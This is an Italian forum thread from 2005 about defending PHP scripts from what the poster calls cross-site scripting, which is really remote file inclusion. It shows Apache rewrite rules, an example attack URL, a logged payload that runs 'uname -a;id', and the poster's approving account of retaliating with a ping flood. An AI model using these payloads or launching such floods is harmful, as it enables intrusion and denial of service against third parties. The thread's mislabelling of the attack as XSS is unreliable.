View Full Version : [PHP security] Cross site scripting
gurutech
15-04-2005, 01:00
ho un problema che mi tormenta da tempo nei miei script php:
subiscono sempre attacchi cross site scripting (XSS)
come prima "pezza" pensavo di usare le rewrite rule in apache. ho testato queste e sembrano funzionare
DocumentRoot /var/www
RewriteEngine on
RewriteCond %{THE_REQUEST} php[^\ ]*(http|%68|%74|%70|%48|%54|%50) [NC]
RewriteRule . http://www.fuckyou.com/ [R]
RewriteCond %{THE_REQUEST} [?][^\ ]*(http|%68|%74|%70|%48|%54|%50) [NC]
RewriteRule . http://www.fuckyou.com/ [R]
secondo voi ci sono controindicazioni?
poi allocherò del tempo per capire come si scrive per benino in php
gurutech
15-04-2005, 08:53
ah , per chi non capisse cosa fa la modifica, provate ad andare su un qualsiasi script del sito, ad es.
http://www.gurutech.it/index.php
e aggiungere alla fine, dopo il php, un ? e una stringa che contenga http, ad esempio
http://www.gurutech.it/index.php?sel=http://www.evilsite.net/badscript.txt
come ho fatto in questo link (http://www.gurutech.it/index.php?sel=http://www.evilsite.net/badscript.txt)
gurutech
15-04-2005, 22:01
funziona!
ho beccato il primo ' stardo.
XSS attempt
Data: Oggi 21:45:02
Da:
[email protected] (root)
A:
[email protected]
200.x.y.z - - [15/Apr/2005:21:43:18 +0200] [www.gurutech.it/sid#808904c][rid#80df494/initial] (1) redirect to http://www.fuckyou.com/?sel=http://www.derf.hpgvip.ig.com.br/newcmd.gif%3f&cmd=uname%2520-a%3bid [REDIRECT/302]
risponde ai ping... e mo' gli faccio passare la voglia a questo
EDIT:
dopo qualche minuto di flood da un po' dei server che gestisco sono arrivato a
"Destination host Unreachable" :winner:
ilsensine
15-04-2005, 22:11
Per me è arabo, ma dovrei aver capito il "messaggio" :D
Mezzelfo
15-04-2005, 22:32
Ho provato a fare quello che hai detto ma non ho capito.......
:confused: :mbe: :(
gurutech
15-04-2005, 22:39
scusate, traduco un po' in italiano:
il cross site scripting consiste nel prendere una pagina di un sito che contiene uno script (un programma) che può essere PHP, ASP, Perl o quant'altro, e cercare di costringere il web server ad eseguire un programma caricandolo da un'altro sito (nell'attacco da me ricevuto arrivava da http://www.derf.hpgvip.ig.com.br/) che non necessariamente è al corrente della cosa.
Appena mi sono accorto dell'attacco, ho proceduto tramite ssh alla connessione su qualcuno dei server che gestisco, che hanno dai 2 ai 10 Mbit/s di banda ed ho eseguito un ping flood (comando: ping -f) cioè un ping che continua ad inondare di pacchetti la destinazione senza aspettare da questa una risposta. Le connessioni comuni generalmente cadono sotto un attacco del genere ben sferrato.
EDIT:
ovviamente subito dopo sono partite le email verso i provider interessati
gurutech
15-04-2005, 22:41
mezzelfo hai provato tu con
www.tyrael.it ?
vBulletin® v3.6.4, Copyright ©2000-2026, Jelsoft Enterprises Ltd.